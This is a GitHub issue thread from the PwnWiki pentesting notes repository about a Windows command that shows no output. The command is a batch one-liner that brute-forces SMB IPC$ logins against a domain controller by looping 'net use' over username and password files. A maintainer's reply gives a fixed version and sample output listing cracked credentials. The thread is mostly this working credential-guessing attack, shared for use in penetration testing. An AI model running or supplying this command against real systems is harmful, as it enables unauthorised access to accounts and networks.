pwnwiki / pwnwiki.github.io

PwnWiki - The notes section of the pentesters mind.
http://pwnwiki.io
MIT License
552 stars 270 forks source link

results not showing #108

Closed polymorphikx closed 7 years ago

polymorphikx commented 8 years ago

@FOR /F %n in (users_T.txt) DO @FOR /F %p in (pass.txt) DO @net use \\IPC$ /user:\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use / delete \IPC$ > NUL

the command runs but nothing shows on the screen...

nixawk commented 7 years ago

@polymorphikx If you get valid credentials, it shows as follow:

C:\Users\test\Desktop>@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DomainController\IPC$ /user:<DomainName>\%n %p 1>NUL 2>&1 && @echo [*] %n:%p &&
 @net use /delete \\DomainController\IPC$ > NUL
[*] Administrator:Password/1.8.0
[*] test: Password_2.0.0
tekwizz123 commented 7 years ago

As this issue appears to be fixed, I will be closing this down. @polymorphikx please raise a seperate issue if your still having problems.